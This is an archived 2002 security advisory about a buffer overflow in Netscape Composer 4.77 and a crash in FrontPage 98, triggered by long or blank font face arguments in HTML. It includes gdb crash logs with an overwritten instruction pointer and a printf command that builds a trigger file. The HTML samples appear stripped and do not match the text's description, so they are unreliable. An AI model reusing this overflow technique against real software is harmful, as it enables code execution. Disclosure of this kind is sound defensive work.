TUCoPS :: Web :: General :: web5446.htm

FrontPage and Netscape Composer design error
14th Jun 2002 [SBWID-5446]
COMMAND

	FrontPage and Netscape Composer design error

SYSTEMS AFFECTED

	 - Microsoft FrontPage 98 

	 - Composer, Netscape 4.77/U.S

	

	maybe others

PROBLEM

	S[h]iff - [ISR] - Infobyte Security Research found following:
	

	When a file in HTML is created that contains for example;
	

	

	------------------------------

	<html>

	<body>

	

	Hola!

	

	</body> </html> ------------------------------
	

	

	The  FrontPage  and  Composer  crash,  for  a  bad  manipulation    (blank arguments).
	

	

	 Buffer Overflow

	 ---------------

	

	The Composer contains uncheck buffer in the label face,  if  you  put  a
	argument of >=191 bytes write part of memory
	

	for example;
	

	

	------------------------------

	<html>

	<body>

	

	Hola!

	

	</body> </html> ------------------------------
	

	

	(A >= 191)
	

	 --------

	 [ gdb logs ]

	 --------

	

	

	(gdb) set args \'-composer\'

	(gdb) run

	Starting program: /usr/bin/netscape \'-composer\'

	

	Program received signal SIGSEGV, Segmentation fault.

	0x846e6bb in CEditElement::SetTagData () at eval.c:88

	(gdb) info all-registers

	eax            0x0      0

	ecx            0xffffffff       -1

	edx            0x90a3be0        151665632

	ebx            0x90a3be0        151665632

	esp            0xbfffe0d4       0xbfffe0d4

	ebp            0xbfffe0e4       0xbfffe0e4

	esi            0x12147820       303331360

	edi            0x12147820       303331360

	eip            0x846e6bb        0x846e6bb

	eflags         0x10246  66118

	

	

	*But the program begin to write ret address memory,  when  A  if  =  197
	byte, check this !
	

	

	# printf \"<html>\\n</body>\\n Hola! \\n</body>\\n</html>\" >> source.htm

	

	

	source.htm created contains ;
	

	

	---------------------------

	<html>

	<body>

	

	Hola!

	

	</body> </html> ---------------------------
	

	

	  -------

	 [ gdb logs ]

	  -------

	

	

	# gdb netscape

	

	(gdb) set args \'-composer\'

	(gdb) run

	Starting program: /usr/bin/netscape \'-composer\'

	

	 * \"Here = does the program loaded the html file with AAA.. in the face args\"

	

	Program received signal SIGSEGV, Segmentation fault.

	[[0x12345678]] in ?? () at eval.c:88

	

	(gdb) info all-registers

	eax            0x9003e22        151010850

	ecx            0x0      0

	edx            0x25c00900       633342208

	ebx            0x90a39a0        151665056

	esp            0xbfffe0c0       0xbfffe0c0

	[ebp            0x41414141       0x41414141]

	esi            0x90d6000        151871488

	edi            0xbfffe0ec       -1073749780

	[eip            0x12345678       0x12345678]

	eflags         0x10246  66118

	

SOLUTION

	Nothing yet.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH